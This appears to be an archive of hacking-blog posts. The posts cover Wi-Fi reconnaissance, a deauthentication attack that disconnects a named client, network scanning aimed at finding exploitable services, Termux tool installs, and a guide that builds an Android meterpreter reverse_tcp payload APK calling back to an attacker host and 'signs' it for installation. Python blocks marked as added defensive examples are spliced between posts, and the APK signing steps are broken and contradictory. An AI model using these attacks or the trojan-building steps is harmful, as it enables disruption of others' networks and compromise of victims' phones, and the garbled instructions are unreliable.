Friday, 11 June 2021

Pre-connection Attack Network Penetration test

Pre-connection Attack

A pre-connection attack is the first part of a network penetration test. To perform it, we look at the fundamentals: how to list all the networks around us and how to find the details of every device connected to a particular network. Once we know the network and the devices connected to it, we can disconnect any of those devices without knowing the network's password.

Following are the basic steps we will go through to perform a pre-connection attack:

  1. Wireless interface in Monitor mode: In this step, we switch the wireless device to Monitor mode.
  2. About airodump-ng: In this step, we use airodump-ng to list all the networks around us and display useful information about them.
  3. Run airodump-ng: In this step, we see all the devices connected to a particular network and collect more information about it.
  4. Deauthenticate the wireless client: In this step, we disconnect any device shown in the previous step using aireplay-ng.

Wireless interface in Monitor Mode

This step puts your wireless card into Monitor mode. In Monitor mode, the card can listen to every packet in range. By default, a wireless device is in "Managed" mode, which means it only captures packets whose destination MAC is the device's own MAC address, that is, packets actually directed to my Kali machine.

But we want to capture all the packets within our range, even if the destination MAC is not ours and even without knowing the password of the target network. To do this, we need to set the mode to Monitor mode.

We can use iwconfig to see the wireless interfaces and their current mode.

In the iwconfig output, you can see that the wireless interface wlan0 is in Managed mode. Use the following commands to switch it to Monitor mode:

ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig

Where

  • ifconfig wlan0 down takes the interface down so that its mode can be changed
  • airmon-ng check kill kills any process that could interfere with using the interface in Monitor mode. After this command, your internet connection will be lost.
  • iwconfig wlan0 mode monitor enables Monitor mode
  • ifconfig wlan0 up brings the interface back up
  • iwconfig confirms that the mode is now Monitor

After these commands, iwconfig shows the mode as Monitor. Now we are able to capture all the Wi-Fi packets within our range, even if they are not directed to our computer and even without knowing the password of the target network.

To do this, we need a program that can capture the packets for us. The program we are going to use is airodump-ng.

About airodump-ng

airodump-ng is used to list all the networks around us and display useful information about them. It is a packet sniffer, so it is designed to capture all the packets around us while we are in Monitor mode. We can run it against all of the networks around us and collect useful information such as the MAC address, channel, encryption type and number of clients connected to each network, and then pick a target network. We can also run it against a specific AP (access point) so that we only capture packets from that one Wi-Fi network.

Syntax

airodump-ng [MonitorModeInterface]

First, let's look at how to run the program. Our Wi-Fi card must be in Monitor mode; its name is wlan0, so the command is:

airodump-ng wlan0

Note: We can press Ctrl + C to stop airodump-ng.

  • BSSID shows the MAC address of the target network
  • PWR shows the signal strength of the network; the higher the number, the better the signal
  • Beacons are the frames sent by the network to broadcast its existence
  • #Data shows the number of data packets (data frames) captured
  • #/s shows the number of data packets per second, measured over the past 10 seconds
  • CH shows the channel the network works on
  • ENC shows the encryption used by the network. It can be WEP, OPN, WPA or WPA2
  • CIPHER shows the cipher used on the network
  • AUTH shows the authentication used on the network
  • ESSID shows the name of the network

In the output, you can see all the wireless networks around us, such as Oppo, perfe, Fligh, Ashu, LIFCA, Xiaom and BS1A-YW5, together with the detailed information about each network.

Run airodump-ng

In this step, we run airodump-ng to see all the devices connected to a particular network and collect more information about it. Once we have chosen a target network, it is useful to run airodump-ng on that network only, instead of on all the networks around us.

Currently, we are running airodump-ng on all the networks around us. Now we are going to target the network BS1A-YW5, whose BSSID is 50:C8:E5:AF:F6:33, and sniff that network only.

To do this, we use the same program. The command is as follows:

airodump-ng --bssid 50:C8:E5:AF:F6:33 --channel 11 --write test wlan0

Where

  • --bssid 50:C8:E5:AF:F6:33 is the access point's MAC address. It is used to eliminate traffic from other networks.
  • --channel 11 is the channel for airodump-ng to sniff on.
  • --write test stores all the captured data in files whose names start with test. It is not mandatory; you can skip this option.
  • wlan0 is the interface name in Monitor mode.

After executing this command, the connected devices are shown in a second table:

Where

  • BSSID is the same for all the devices because they are connected to the same network
  • STATION shows the MAC address of each device connected to this network
  • PWR shows the signal strength of each device
  • Rate shows the connection speed
  • Lost shows the number of lost packets
  • Frames shows the number of frames we have captured from the device

After executing this command, we see 3 devices connected to the network BS1A-YW5, all showing the same BSSID, 50:C8:E5:AF:F6:33.
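The AP columns and the station columns described above are exactly what airodump-ng writes to the CSV file when --write is used, so the survey can be reviewed offline. The following is an added example (not code from the original post) that parses that CSV layout and reports the findings a network owner would want from a survey: networks with no or trivially broken encryption, one ESSID advertised by several BSSIDs (a rogue or misconfigured AP to investigate), and the stations seen per BSSID. The CSV content is constructed; only the BSSID, client MAC and network names come from the walkthrough.

```python
import csv
import io
from collections import defaultdict

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv when
# run with --write: an access-point table, a blank line, then a station table.
# The BSSID, client MAC and network names come from the walkthrough above; the
# timestamps, counts, the OPN and WEP networks and the second BS1A-YW5 entry
# are made up for the example.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
50:C8:E5:AF:F6:33, 2021-06-11 10:00:01, 2021-06-11 10:05:01, 11, 54, WPA2, CCMP, PSK, -45, 120, 0, 0.0.0.0, 8, BS1A-YW5,
02:11:22:33:44:55, 2021-06-11 10:03:10, 2021-06-11 10:05:01, 6, 54, OPN, , , -60, 40, 0, 0.0.0.0, 8, BS1A-YW5,
AA:BB:CC:DD:EE:01, 2021-06-11 10:00:02, 2021-06-11 10:05:01, 1, 54, WEP, WEP, , -70, 90, 12, 0.0.0.0, 5, Fligh,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
A8:7D:12:30:E9:A4, 2021-06-11 10:00:05, 2021-06-11 10:05:00, -50, 300, 50:C8:E5:AF:F6:33, BS1A-YW5
DE:AD:BE:EF:00:01, 2021-06-11 10:04:00, 2021-06-11 10:05:00, -55, 10, (not associated), Oppo
"""


def parse_airodump_csv(text):
    """Split the two tables and return (access_points, stations) as lists of dicts."""
    blocks = [b for b in text.strip("\n").split("\n\n") if b.strip()]
    if len(blocks) != 2:
        raise ValueError("expected an access-point table and a station table")
    tables = []
    for block in blocks:
        reader = csv.reader(io.StringIO(block), skipinitialspace=True)
        header = [h.strip() for h in next(reader)]
        rows = [{h: v.strip() for h, v in zip(header, row)}
                for row in reader if row and row[0].strip()]
        tables.append(rows)
    return tables[0], tables[1]


WEAK_PRIVACY = {"OPN", "WEP"}   # no encryption, or encryption that is trivially broken


def review_survey(access_points, stations):
    """Return (findings, clients): networks with weak encryption, one ESSID
    advertised by several BSSIDs (possible rogue AP), and stations per BSSID."""
    findings = []
    bssids_by_essid = defaultdict(set)
    for ap in access_points:
        if ap["ESSID"]:                      # hidden networks have an empty ESSID
            bssids_by_essid[ap["ESSID"]].add(ap["BSSID"])
        if ap["Privacy"] in WEAK_PRIVACY:
            findings.append(f"{ap['BSSID']} '{ap['ESSID']}' uses {ap['Privacy']}")
    for essid, bssids in bssids_by_essid.items():
        if len(bssids) > 1:
            findings.append(f"ESSID '{essid}' advertised by {len(bssids)} BSSIDs: {sorted(bssids)}")
    clients = defaultdict(list)
    for st in stations:
        clients[st["BSSID"]].append(st["Station MAC"])
    return findings, dict(clients)


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for line in review_survey(aps, stations)[0]:
        print(line)
```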

Deauthenticate the wireless client

This step is also known as a deauthentication attack. These attacks are very useful: they allow us to disconnect any device from any network within our range, even if the network is encrypted or uses a key.

In a deauthentication attack, we pretend to be the client: we change our MAC address to the client's MAC address and send a deauthentication packet to the router, telling the router that we want to disconnect. At the same time, we pretend to be the router by changing our MAC address to the router's MAC address and tell the client that it has been disconnected. After this, the connection is lost. Through this process, we can disconnect or deauthenticate any client from any network. To do this, we use a tool called aireplay-ng.




First of all, we run airodump-ng on the target network, because we want to see which clients or devices are connected to it. This time we do not need the --write option, so we simply leave it out. Once airodump-ng shows the connected clients, we disconnect the device with STATION A8:7D:12:30:E9:A4 using aireplay-ng.

Syntax

aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]

After executing this command, the device with STATION A8:7D:12:30:E9:A4 loses its internet connection. It can only connect to the network again once we stop the command by pressing Ctrl + C.

Where

  • --deauth tells aireplay-ng that we want to run a deauthentication attack; the value 100000 is the number of packets, so that it keeps sending deauthentication packets to both the router and the client and keeps the client disconnected.
  • -a specifies the MAC address of the router. 50:C8:E5:AF:F6:33 is the target access point.
  • -c specifies the MAC address of the client. A8:7D:12:30:E9:A4 is the client's MAC address.
  • wlan0 is the wireless adapter in Monitor mode.
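On the wire, the attack described above looks like a flood of deauthentication frames in both directions between the AP's MAC and the client's MAC, which is easy to distinguish from the occasional legitimate deauthentication. The following is an added example (not code from the original post) of the detection logic a wireless IDS applies: a sliding-window count of deauthentication frames per (source, destination) pair. The frames are constructed in the script; in a real deployment they would come from a monitor-mode capture, and only the two MAC addresses are taken from the walkthrough.

```python
from collections import defaultdict, deque

AP_MAC = "50:C8:E5:AF:F6:33"      # access point from the walkthrough above
CLIENT_MAC = "A8:7D:12:30:E9:A4"  # client from the walkthrough above


def make_sample_frames():
    """Constructed capture: normal data frames, one ordinary deauthentication,
    then a burst of deauthentication frames spoofed in both directions."""
    frames, t = [], 0.0
    for _ in range(20):
        frames.append({"t": t, "type": "data", "src": CLIENT_MAC, "dst": AP_MAC})
        t += 0.5
    # a single deauthentication is normal (e.g. the AP dropping an idle client)
    frames.append({"t": t, "type": "deauth", "src": AP_MAC, "dst": CLIENT_MAC})
    t += 5.0
    for _ in range(60):  # 60 frames per direction, 20 ms apart
        frames.append({"t": t, "type": "deauth", "src": AP_MAC, "dst": CLIENT_MAC})
        frames.append({"t": t, "type": "deauth", "src": CLIENT_MAC, "dst": AP_MAC})
        t += 0.02
    return frames


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Return one alert per (src, dst) pair that sends at least `threshold`
    deauthentication frames within any `window` seconds."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerted, alerts = set(), []
    for f in sorted(frames, key=lambda f: f["t"]):
        if f["type"] != "deauth":
            continue
        key = (f["src"], f["dst"])
        q = recent[key]
        q.append(f["t"])
        while q and f["t"] - q[0] > window:   # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": f["src"], "dst": f["dst"], "count": len(q), "t": f["t"]})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_flood(make_sample_frames()):
        print(f"deauth flood {a['src']} -> {a['dst']}: {a['count']} frames within 1 s at t={a['t']:.2f}")
```

Detection only tells you the attack is happening; the mitigation is Protected Management Frames (802.11w, mandatory in WPA3), which lets the AP and client discard deauthentication frames that are not authenticated.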




Post Attacks kali Ethical Hacking

Post-Connection Attacks

In all the attacks we performed in the pre-connection and gaining-access sections, we were not connected to a network. In this section, we talk about post-connection attacks, that is, attacks we can carry out after connecting to the network. It does not matter whether the network is wireless or wired, or whether the target uses a WEP or WPA key: we can launch all of the attacks covered in this section.

In all the previous attacks, we kept our wireless card in Monitor mode so that we could capture any packet in the air. In this section, we use our wireless card in Managed mode, because we have access to the network and no longer need to capture everything; we only want the packets directed to us.

In this section, we look at the attacks we can perform once we are inside the network. First, we use the tool netdiscover to gather the important information about the network that will help us launch attacks; it is used to discover all the clients connected to the network. After that, we learn a tool called Zenmap, which has a better interface and is more powerful than netdiscover. It is used to gather detailed information about all of the clients connected to the same network.

Netdiscover

netdiscover is a tool used to gather the important information about the network. It gathers information about the connected clients and the router. For the connected clients, we will be able to find out their IP and MAC addresses and their operating system, as well as the ports they have open. For the router, it helps us identify the manufacturer. We can then look for vulnerabilities to use against the clients or the router if we are trying to hack them.

In the network penetration testing section, we used airodump-ng to discover all the clients connected to the network: in the second part of the airodump-ng output, we saw the associated clients and their MAC addresses. We can get all of those details before connecting to the target access point. Now, after connecting to the network, we can gather much more detailed information about these devices. There are many programs for this task, but we will talk about two of them, starting with the simplest and quickest one, netdiscover.

netdiscover is the quicker and simpler program to use, but it does not show very detailed information about the target clients. It only shows their IP address, their MAC address and sometimes the hardware manufacturer. We use it by typing netdiscover, then -r, and then the range, which can be any range we want. Looking at our IP (which is 10.0.2.1) tells us which network we are in. We want to discover all the clients in this network, so we try 10.0.2.1, then 10.0.2.2, 10.0.2.3 and so on up to 10.0.2.254, the end of the range. To specify the whole range we write /24, which means we start at 10.0.2.1 and the address increases up to 10.0.2.254, the end of the IP range of the network. The command is as follows:

netdiscover -r 10.0.2.1/24

Now hit Enter. It returns the output very fast, producing the result shown in the following screenshot:


In the screenshot, we can see four devices connected to the network, with their IP address, MAC address and MAC vendor. This method is very quick, but it only shows basic information.

Zenmap

Nmap (Network Mapper) is the second program we are going to look at. It is a huge tool with many uses. Nmap is used to gather information about any device: using Nmap, we can gather information about any client inside or outside our network just by knowing its IP. Nmap can be used to bypass firewalls, as well as all kinds of protection and security measures. In this section, we learn some basic Nmap commands that discover the clients connected to our network and the open ports on those clients.

We use Zenmap, which is the graphical user interface for Nmap. Typing zenmap in the Terminal brings up the application:



In the Target field, we're going to put our IP address. In the Profile drop-down menu, we can have various profiles:



In the Target field, if you want to gather information about only one IP address, just enter that address. We can also enter a range, as we did with netdiscover. We enter 198.168.1.1/24, select Ping scan from the Profile drop-down menu and hit the Scan button:




The preceding scan is a quick scan, but it does not show much information, as we can see in the preceding screenshot: it only shows the connected devices. It is very fast. The connected devices appear in the left-hand panel, with their IP addresses, MAC addresses and vendors.

The next scan is the Quick scan. The Quick scan is slightly slower than the Ping scan, but it gives more information: it identifies the open ports on each device:


In the screenshot, we can see the open ports on each of the discovered devices. The main router has an open port, 53/tcp. Port 80/tcp is used by the router's settings page, because it is served by a web server.

Now let's look at the Quick scan plus, which takes the Quick scan one step further. It is slower than the Quick scan, but it shows us the programs running on the open ports. In the Quick scan, we saw that port 80 was open, but we did not know what was running on it; we saw that port 22 was open and knew it was SSH, but not which SSH server was running on that port.

So again, the Quick scan plus takes longer than the Quick scan, but it gathers more information, as shown in the following screenshot:




In the preceding screenshot, we can see a Linux device connected. The scan shows the operating system of the connected device and also the versions of the programs. In the Quick scan, we only knew that port 22 was open; now we know that the server running on it is OpenSSH 4.7, and that port 80 is running Apache HTTP Server 2.2.8 on a Linux device. With this information we can go ahead and look for exploits and vulnerabilities.
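The same service-and-version data that Zenmap shows in its panel is available as XML (Nmap's -oX output, which Zenmap uses underneath), which is how a network owner turns a scan into an inventory and a patch list instead of reading screenshots. The following is an added example (not code from the original post, and not part of Nmap or Zenmap) that parses a constructed Nmap XML report shaped like the Quick scan plus result above and flags services older than a constructed minimum-version baseline; the addresses, vendor string, OS match text and baseline versions are all assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed nmap XML report (the format written by `nmap -oX`, which Zenmap
# also uses), shaped like the Quick scan plus result described above: a Linux
# host with OpenSSH 4.7 and Apache httpd 2.2.8, and the router with 53/tcp and
# 80/tcp open. The addresses, vendor string and OS match text are made up.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -F 10.0.2.0/24">
  <host><status state="up"/><address addr="10.0.2.4" addrtype="ipv4"/>
    <address addr="08:00:27:AA:BB:CC" addrtype="mac" vendor="Example Vendor"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.8"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os></host>
  <host><status state="up"/><address addr="10.0.2.1" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="53"><state state="open"/><service name="domain"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port></ports></host>
  <host><status state="down"/><address addr="10.0.2.9" addrtype="ipv4"/></host>
</nmaprun>
"""

def _attr(element, name):
    """Attribute lookup that tolerates a missing element."""
    return element.get(name) if element is not None else None

def parse_nmap_xml(text):
    """Return the hosts that are up: ip, mac, vendor, OS guess and open ports."""
    hosts = []
    for h in ET.fromstring(text).findall("host"):
        if _attr(h.find("status"), "state") != "up":
            continue
        addrs = {a.get("addrtype"): a for a in h.findall("address")}
        ports = []
        for p in h.findall("ports/port"):
            if _attr(p.find("state"), "state") != "open":
                continue
            svc = p.find("service")
            ports.append({"port": int(p.get("portid")), "proto": p.get("protocol"),
                          "service": _attr(svc, "name"), "product": _attr(svc, "product"),
                          "version": _attr(svc, "version")})
        hosts.append({"ip": _attr(addrs.get("ipv4"), "addr"),
                      "mac": _attr(addrs.get("mac"), "addr"),
                      "vendor": _attr(addrs.get("mac"), "vendor"),
                      "os": _attr(h.find("os/osmatch"), "name"), "ports": ports})
    return hosts

# Constructed baseline: the oldest version of each product we still accept.
MIN_VERSION = {"OpenSSH": "8.0", "Apache httpd": "2.4"}

def version_tuple(version):
    """'4.7p1' -> (4, 7): compare only the leading dotted numbers."""
    m = re.match(r"\d+(\.\d+)*", version or "")
    return tuple(int(x) for x in m.group(0).split(".")) if m else ()

def outdated_services(hosts, baseline=MIN_VERSION):
    """List (ip, port, product, version) for services older than the baseline."""
    hits = []
    for h in hosts:
        for p in h["ports"]:
            floor = baseline.get(p["product"])
            if floor and p["version"] and version_tuple(p["version"]) < version_tuple(floor):
                hits.append((h["ip"], p["port"], p["product"], p["version"]))
    return hits
```

Services without a product or version string (such as the router's 53/tcp and 80/tcp here) are skipped rather than flagged, so they still need a manual look.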





Programming environment in Termux

Programming environment in Termux

Make a programming environment

We can install several programming languages, such as Python, C and Ruby, on Termux.


Python


Python is the most used scripting language in hacking and penetration testing. We use it to automate things and build tools. Python is also widely used in machine learning.

apt-get install python


C


C language is the core language of many other programming languages. You can learn computer architecture deeply if you get a good knowledge of C.

apt-get install clang


Ruby


If you want to install Metasploit on Termux you need Ruby, because MSF is written in Ruby.

apt-get install ruby


Assembly


If you are planning to learn hacking, Assembly is a must. I suggest you write code in C, then disassemble it and learn Assembly from the result.

apt-get install binutils


Turn your phone into a web server


You may know that you can build a simple HTTP server with Python. If you do not, read our Python simple HTTP server tutorial.

You can use the following command to serve the current directory on port 4444 (Termux's python is Python 3, whose module is http.server; SimpleHTTPServer was the Python 2 name of the same module):

python -m http.server 4444

By default this listens on every interface, so everyone on the same Wi-Fi network can read the served directory; add --bind 127.0.0.1 to restrict it to the phone itself.

You can also install the Apache web server in your Termux environment, and PHP and Python alongside it, so you can run a fully functional web server on your phone.


Some useful tools to install


Linux man pages


These are the Linux manual pages for programmers. There are hundreds of documents explaining various APIs and tools. For example, if we want to know about the read() function in C, we can just type "man read", which opens a page explaining how to work with the read function.

You may install the manual pages with the following command.

apt-get install man


Nano editor


This is a simple text editor that can be used in the terminal. We use it often for Linux programming and text editing. The following image shows a screenshot of the nano editor.


Thursday, 10 June 2021

IP-Tracer

 IP-Tracer


What is IP-Tracer?

IP-Tracer is used to track an IP address. It is developed for Termux and Linux-based systems. You can easily retrieve IP address information using IP-Tracer, which uses ip-api to track the address.




How to install IP-Tracer?

$ apt update
$ apt install git -y
$ git clone https://github.com/rajkumardusad/IP-Tracer.git
$ cd IP-Tracer
$ chmod +x install
$ sh install   (or: ./install)


How to use IP-Tracer

trace -m to track your own IP address.

trace -t target-ip to track another host's IP address, for example trace -t 127.0.0.1

trace for more information.

OR

ip-tracer -m to track your own IP address.

ip-tracer -t target-ip to track another host's IP address, for example ip-tracer -t 127.0.0.1

ip-tracer for more information.


CYBER-SCAN

CYBER-SCAN



CyberScan is an open source penetration testing tool that can analyse and decode packets, scan ports, ping hosts and geolocate an IP address (latitude, longitude, region, country, ...).


Installation:

$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/medbenali/CyberScan.git
$ cd CyberScan


Usage:

$ python2 CyberScan.py -v
$ CyberScan -h


We can perform ping operations with several protocols using CyberScan.

The fastest way to discover hosts on a local Ethernet network is to use ARP:

$ python2 CyberScan.py -s 192.168.1.0/24 -p arp

In case ICMP echo requests are blocked, we can still use TCP:

$ CyberScan -s 192.168.1.105 -p tcp -d 80

where 192.168.1.105 is the target IP.

Nikto web server scanner | Termux

Nikto web server scanner

Nikto is a web server assessment tool.

The Nikto web server scanner is a security tool that tests a web site for thousands of possible security issues, including dangerous files, misconfigured services, vulnerable scripts and other problems. It is open source and structured around plugins that extend its capabilities; these plugins are frequently updated with new security checks.

It is designed to find various default and insecure files, misconfigurations and programs on any type of web server.


Installation in Termux:

$ apt update && apt upgrade
$ apt install git
$ apt install perl
$ git clone https://github.com/sullo/nikto
$ cd nikto
$ chmod +x *


Usage:

$ perl nikto.pl -H

This shows all the options for using the tool.

Wednesday, 9 June 2021

HOW TO Sign the APK File with Embedded Payload

HOW TO Sign the APK File with Embedded Payload

Hi MoboTherapy families, welcome back.

Today I'm gonna show you "How To Sign the APK File with Embedded Payload". I made this because many of you asked me to solve this error (This was built for an older version of Android and may not work properly). The following method works 100%, so follow the steps carefully.

If you ask me why we have to sign the APK file, here is why:

On modern Android phones, unsigned APK files can be easily installed, but older versions of Android do not support the installation of unsigned APK files. This is not a common problem, but for publishers and hackers it can create a lot of problems, because unsigned APK files give an error on older Android versions and cannot even be uploaded to Google Play.

To manually and properly sign the APK, follow these steps carefully!

Let's begin...

  • Requirements

1). Kali Linux (latest version preferred)
2). Java v8 or above (latest version preferred)
3). ZipAlign tool (download it from the link in the post; install instructions included)



  • Installation

1). The latest version of Java is already installed in Kali Linux, so you don't need to download it manually.

2). The Zip-Align tool can be found at the link in the post, where the installation instructions are discussed. If you have any problems, you can install it by typing these commands:

  1. Update the package index:
     sudo apt-get update
  2. Install the zipalign deb package:
     sudo apt-get install zipalign

OR

  1. Update the package index:
     sudo apt-get update
  2. Install the google-android-build-tools-installer deb package:
     sudo apt-get install google-android-build-tools-installer

3). Here I am going to generate a key named key.jks for Kali.apk, which has already been generated by the msfvenom command.

  • Signing the APK File Manually

1). First, generate an unsigned APK file with the embedded payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > Kali.apk

2). Now we generate a key, key.jks, with keytool. For this, type in the Terminal (screenshot below):

keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias

3). Enter a memorable keystore password (e.g. 123456).

4). Now it asks for your personal information. Just fill in the form with any values (as I did in the screenshot above) and finally type yes. This generates the key.

5). BINGO! The APK file has been signed. Now the most important step, zip aligning, is left. Just type the following command in the terminal to get the signed Kali.apk:

zipalign -v 4 Kali.apk Kali-Signed.apk

DONE. You have successfully generated a signed APK file.

Location

Your manually signed APK file with embedded payload can be found here:
/root/payloadapk-Signed.apk







Note: That's all. There are many other methods on the internet; this is not the only one, so you can check them out if this method does not satisfy you. I hope you can solve your problem and enjoy. Thank you.


DISCLAIMER: This thread is only for educational purposes. I will not be responsible for any illegal use of this information. Try not to hack Androids other than your own.